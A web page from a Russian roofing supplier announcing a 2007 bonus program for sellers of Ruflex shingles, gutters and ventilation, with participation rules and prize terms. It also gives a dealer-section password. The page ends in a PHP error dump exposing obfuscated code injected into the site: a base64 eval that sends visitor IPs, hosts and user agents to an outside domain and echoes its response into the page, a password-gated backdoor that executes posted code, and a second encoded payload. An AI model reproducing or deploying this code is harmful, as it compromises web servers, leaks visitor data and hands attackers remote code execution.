Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

10.07.2007

Акция для продавцов кровельных материалов от компании Диана-Трейд

С 21 мая 2007 года проводится Акция "Подарки от Дианы-Трейд - 2007"!

Компания «Диана–Трейд» - ведущий российский поставщик кровельных материалов с мировым именем предлагает принять участие в программе продвижения (далее Акция) гибкой черепицы Ruflex (далее ГЧ Ruflex), водосточной системы Ruflex (далее ВС Ruflex) и системы подкровельной вентиляции House Line vent (далее ВНТ House Line vent) в целях наиболее успешного, максимально эффективного и профессионального подхода к реализации кровельных материалов:
Продажа основного кровельного материала без водосточной системы и системы подкровельной вентиляции – это упущенная прибыль и возможные претензии от покупателя в будущем.

Участвуя в Акции, Вы имеете возможность не только усовершенствовать свой профессиональный уровень, но и получить бонус за эффективные продажи в сезоне 2007г. товаров Организатора, предлагаемых в рамках Акции.

Организатор ООО Диана-Трейд,
официальный сайт Программы – www.diana.ru
Центр поддержки программы
Тел. (495) 424-75-97


Цель программы

Целью данной программы является развитие навыков комплексного подхода к реализации кровельных материалов с использованием системы поощрения сертификатами одной из крупнейших сетей бытовой и компьютерной техники, а также вознаграждения ценными подарками и вручение СУПЕР ПРИЗОВ подробная информация на сайте: www.diana.ru.
Как работает программа?
Все очень просто!

  • Вы ЭФФЕКТИВНО РАБОТАЕТЕ, продавая ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent.
  • Вы НАБИРАЕТЕ призовые баллы.
  • Вы САМОСТОЯТЕЛЬНО ВЫБИРАЕТЕ свой подарок исходя из начисленной суммы баллов.
  • Вы можете стать участником РАЗВЛЕКАТЕЛЬНОГО МЕРОПРИЯТИЯ
  • Вы можете стать обладателем одного из СУПЕР ПРИЗОВ

ОБЩИЕ ПОЛОЖЕНИЯ

Участником Акции (далее “Участник Акции”) может стать менеджер-консультант (продавец), осуществляющий розничную торговлю товаров ассортиментного портфеля компании Диана-Трейд (ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent) в Российской Федерации. Менеджер (продавец) должен непосредственно участвовать в процессе продаж ГЧ конечным покупателям (частные застройщики, строители и прорабы, архитекторы и т.д.).
В Акции не могут участвовать работники и представители Организатора, а также сотрудники и представители любых иных лиц, не являющихся сертифицированными дилерами и дистрибьюторами и их субдилерами по продукции Организатора.
Акция проводится в период с 21 мая на территории Москвы и Московской области.
География проведения Акции может быть расширена по решению Организатора.

УСЛОВИЯ УЧАСТИЯ В АКЦИИ

Право участия в Акции имеют продавцы, прошедшие обучение у специалистов тренингового центра Организатора и получившие аттестат.
При отсутствии аттестатов, необходимо посетить семинары и тренинги по ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent у Организатора.
Каждый Участник Акции принимает на себя обязательства по соблюдению правил, относящихся к ее организации и условиям проведения. Обязательным условием участия в Акции являются:
- заполненная и заверенная печатью работодателя анкета Участника Акции;
- осуществление продаж Участником Акции на торговой точке, имеющей сертификат, выданный организатором;
- надлежащее оформление торговой точки стендами и образцами продукции, а также рекламной полиграфией с информацией о ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent;
- обязательное информирование покупателей о проведении акции «Подарки от Диана-Трейд – 2007»
- полное и корректное представление (относительно аналогичных товаров) ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent потенциальным покупателям кровельных материалов;
- ежемесячное предоставление отчетных документов (Заполненный бланк участника Акции, копии отгрузочных накладных, копии призовых купонов, копии гарантийных талонов) Организатору Акции. Учету подлежат только товары, поставщиком которых является Организатор Акции, не позднее 10 числа текущего месяца, следующего за отчетным.
Примечание: в период проведения акции Организатор осуществляет проверку качества представления ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent Участниками Акции с использованием программы «Таинственный покупатель».

ПРЕДОСТАВЛЕНИЕ ИНФОРМАЦИИ ОТ УЧАСТНИКОВ АКЦИИ

Руководство Участника Акции заверяет подлинность внесенной в бланк Акции информации подписью уполномоченного представителя и печатью организации.
Организатор осуществляет сбор заполненных и заверенных в установленном порядке бланков Акции самостоятельно, после консолидированной передачи отчетных документов в центральные офисы участников Акции. После проверки подлинности предоставленных документов, Участнику начисляются баллы.
В случае выявления фактов фальсификации данных или несоблюдения условий Акции, Участник, который допустил нарушение, исключается из Акции (баллы, набранные им аннулируются), без предварительного уведомления.

Организатор оставляет за собой право по своему усмотрению изменять сумму баллов, накопленных Участником Акции за некорректное сравнение продукции поставляемой Организатором - ГЧ Ruflex с аналогичной продукцией;
- ВС Ruflex с аналогичной продукцией;
- ВНТ House Line vent.

Примечание: Некорректным является сравнение, которое предполагает проведение Участником Акции сопоставлений и оценки физико-механических и иных характеристик двух (и более) товаров, которые позволили бы покупателю сделать вывод о преимуществе аналогичной продукции относительно ГЧ Ruflex, ВС Ruflex и ВНТ House Line vent.

ПОДВЕДЕНИЕ ИТОГОВ И НАГРАЖДЕНИЕ

Промежуточные подведения итогов Акции осуществляются Организатором в течение 30 дней следующих за отчетным месяцем. По результатам Участникам вручаются подарочные Сертификаты одной из крупнейших сетей бытовой и компьютерной техники на сумму эквивалентную набранным баллам.

С системой начисления баллов для менеджеров- консультантов (продавцов) розничных точек вы можете ознакомиться здесь.

С системой начисления баллов для менеджеров- консультантов (продавцов) дилерских отделов вы можете ознакомиться здесь.

Организатор ежемесячно подводит итоги Акции и официально объявляет о сумме баллов набранных Участниками Акции, на официальном сайте Организатора: www.diana.ru
Страница: www.diana.ru (раздел «Дилерам/ Специальные Акции»)
Пароль: diana
Подарочные сертификаты Сертификат выдается Участнику Акции по предъявлению паспорта.

Сумма подарочного сертификата в денежном эквиваленте не выдаётся, обмену и возврату не подлежит. Все налоги, сборы и платежи по факту получения подарочного Сертификата и ценных призов от Организатора, предусмотренные действующим законодательством, оплачиваются лицом, получившим данный Сертификат, и не относятся к компетенции Организатора.

Факт получения подарочного Сертификата означает, что Участник соглашается с тем, что его имя, фамилия, фотографии и иные материалы, полученные Организатором в результате Акции, могут быть размещены на сайте Организатора.

Организатор гарантирует полное соблюдение конфиденциальности контактной информации Покупателя, зафиксированных в бланке Акции, в случаях предусмотренных действующим законодательством РФ. Организатор не несёт ответственности за соблюдение конфиденциальности информации со стороны третьих лиц.

ПРАВА ОРГАНИЗАТОРА АКЦИИ

Организатор оставляет за собой право в одностороннем порядке, без предварительного уведомления, изменять сроки, условия и порядок проведения акции.
Организатор оставляет за собой право публиковать дополнительную информацию об Акции. Обновленная информация своевременно размещается на официальном сайте Организатора www.diana.ru

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0041 s(2 Requests)
  PHP: 0.2818 s 
  Total: 0.2858 s